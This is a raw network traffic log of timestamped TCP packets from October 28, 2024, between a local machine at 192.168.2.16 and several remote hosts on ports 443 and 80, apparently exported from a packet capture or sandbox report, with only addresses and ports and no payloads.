                                                                                                                                                Oct 28, 2024 17:47:38.548479080 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.549350023 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.549474001 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.549491882 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.549547911 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.549921036 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.582782984 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.582835913 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.582855940 CET49732443192.168.2.16172.202.163.200
                                                                                                                                                Oct 28, 2024 17:47:38.582864046 CET44349732172.202.163.200192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.797117949 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.814896107 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.814933062 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.816083908 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.816167116 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.819035053 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.819112062 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.819411993 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.819430113 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.875899076 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.955364943 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955653906 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955739975 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955800056 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.955816031 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955831051 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955858946 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.955904961 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955940962 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.955949068 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.955965996 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.956003904 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.956044912 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.956056118 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.956100941 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.992028952 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.992084026 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:38.992153883 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.992378950 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:38.992393017 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.071728945 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.071800947 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.071836948 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.071892023 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.071933985 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.071984053 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.072024107 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.072094917 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.072119951 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.072134018 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.072143078 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.072468042 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.073601007 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.073643923 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.073690891 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.073704958 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.073719978 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.073757887 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.073875904 CET49731443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.073893070 CET44349731104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.077842951 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.077877045 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.077950001 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.078198910 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.078213930 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.128492117 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:39.612240076 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.612523079 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.612555981 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.612905979 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.613205910 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.613267899 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.613347054 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.659358978 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.698808908 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.699095964 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.699117899 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.700333118 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.700680971 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.700809002 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.700814009 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.700860023 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.746493101 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.762001038 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762048006 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762080908 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762119055 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762166023 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762233973 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.762242079 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762263060 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762299061 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762326002 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762341976 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.762348890 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.762537956 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.866185904 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.866255999 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.866319895 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.867016077 CET49736443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.867033958 CET44349736104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.870302916 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:39.870346069 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.870456934 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:39.870771885 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:39.870790005 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.880672932 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.880917072 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.880948067 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.880984068 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.880992889 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.881017923 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.881036997 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.881437063 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.881491899 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.881520987 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.881537914 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.881546021 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.881568909 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.936475039 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.936507940 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.984498978 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.999607086 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.999671936 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.999720097 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.999736071 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:39.999747038 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:39.999855042 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.000071049 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.000317097 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.000346899 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.000411034 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.000417948 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.000505924 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.000854015 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.048494101 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.087080956 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.087162018 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.087389946 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.087409973 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118495941 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118531942 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118567944 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118567944 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.118586063 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118616104 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.118776083 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118828058 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118834019 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.118839025 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.118885994 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.119141102 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.160504103 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.160514116 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.208503008 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.208518982 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.237554073 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.237684965 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.237709045 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.237723112 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.237780094 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.237787008 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.238310099 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.238320112 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.238387108 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.238394976 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.287491083 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.324846983 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.324862957 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.324939013 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.356051922 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356065035 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356139898 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.356492043 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356501102 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356544018 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356555939 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.356569052 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.356585026 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.356614113 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.794358015 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.794374943 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.794480085 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.794975996 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.794985056 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795022964 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795037031 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795057058 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795073032 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795077085 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795120955 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795130014 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795140028 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795145988 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795167923 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795639992 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795748949 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795756102 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795818090 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.795926094 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.795977116 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.796000957 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.796047926 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.796053886 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.796108961 CET44349735104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.796209097 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.796209097 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.796238899 CET49735443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.797529936 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.797811031 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.797837019 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.798223019 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.798670053 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.798759937 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.799316883 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.799807072 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.799834967 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.799932957 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.800134897 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.800144911 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.819937944 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:40.819981098 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.820139885 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:40.820580959 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:40.820596933 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.843341112 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.959486008 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.959537029 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.959628105 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.959913969 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:40.959932089 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.965934038 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.966016054 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:40.966161966 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.966778994 CET49738443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:40.966798067 CET44349738104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.408895969 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.409353018 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.409377098 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.409723043 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.410068989 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.410126925 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.410334110 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.429769993 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.430378914 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.430402994 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.432333946 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.432404995 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.432739973 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.432754040 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.432806015 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.432825089 CET44349740188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.432883024 CET49740443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.433132887 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.433167934 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.433264971 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.433624983 CET49742443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:41.433640957 CET44349742188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.451328039 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.539488077 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                Oct 28, 2024 17:47:41.548459053 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548518896 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548553944 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548588037 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548621893 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548628092 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.548654079 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548669100 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.548690081 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548693895 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.548701048 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.548739910 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.549241066 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.557105064 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.557387114 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.557405949 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.557785034 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.558168888 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.558250904 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.558347940 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.558409929 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.558442116 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.602509022 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.602523088 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.650505066 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.665476084 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.665626049 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.665680885 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.665682077 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.665692091 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.665726900 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.666096926 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666415930 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666465044 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666507959 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666512012 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.666517019 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666682005 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.666692019 CET44349739104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.666738033 CET49739443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:41.727185011 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727237940 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727271080 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727303028 CET44349741104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:41.727304935 CET49741443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:41.727334976 CET44349741104.18.94.41192.168.2.16
